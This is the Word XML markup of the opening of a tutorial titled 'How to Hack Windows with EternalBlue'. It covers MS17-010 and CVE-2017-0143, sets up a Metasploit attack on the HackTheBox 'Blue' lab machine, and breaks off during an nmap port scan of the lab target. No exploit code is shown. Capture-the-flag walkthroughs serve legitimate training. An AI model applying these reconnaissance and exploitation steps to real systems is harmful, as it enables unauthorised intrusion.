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48D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:spacing w:after="150" w:line="645" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:b/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:b/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Hack Windows with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:b/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:spacing w:after="225" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hello Hackers!!</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">On April 8 of 2017, the group The Shadow Brokers after entering the systems of the NSA, to expose in their </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the tools they found.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:spacing w:after="225" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Within the filtered tools, there is an exploit (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) that allows exploiting a vulnerability in the SMB protocol version 1, and of this way can execute Remote Code (RCE) on the victim machine gaining access to the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Bulletin: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="0013348D">
          <w:rPr>
            <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>MS17-010(Critical)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Common Vulnerabilities and Exposures: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="0013348D">
          <w:rPr>
            <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>CVE-2017-0143</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:spacing w:after="225" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>¿WHAT EFFECT HAVE THIS VULNERABILITY?</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">This vulnerability was used to propagate Ransomware </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Wanna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cry, which encrypted data from companies, and medical centers. To date, there are many variants of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ransomeware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:spacing w:after="225" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hacking </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="0013348D">
          <w:rPr>
            <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Blue</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:spacing w:after="225" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Today we will learn how to exploit this vulnerability using Metasploit, for this demonstration an intrusion test will be performed towards the </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="0013348D">
          <w:rPr>
            <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Blue</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> machine of the HackTheBox platform.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:spacing w:after="225" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Network Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:spacing w:after="225" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Let’s start with a quick NMAP scan to discover open ports.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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>╭</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>─[~/Desktop/APOLO/Ethic4l-Hacking/Operations/Premium/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Blue]─</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[root@Arthorias]─[0]─[3673]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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>╰</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>─[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)]</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D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13348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p- -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Blue.nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.10.10.40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 xml:space="preserve">Starting Nmap 7.70 </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="0013348D">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://nmap.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0013348D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13348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> at 2019-04-09 08:54 -05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 xml:space="preserve">Nmap scan report </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10.10.10.40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 xml:space="preserve">Host is up </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0.39s latency</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.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>Not shown: 65526 closed ports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>PORT      STATE SERVICE      VERSION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 xml:space="preserve">135/tcp   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msrpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        Microsoft Windows RPC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 xml:space="preserve">139/tcp   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>netbios</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-ssn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Microsoft Windows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>netbios-ssn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve">445/tcp   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">-ds Microsoft Windows 7 - 10 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">-ds </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>workgroup: WORKGROUP</w:t>
      </w:r>
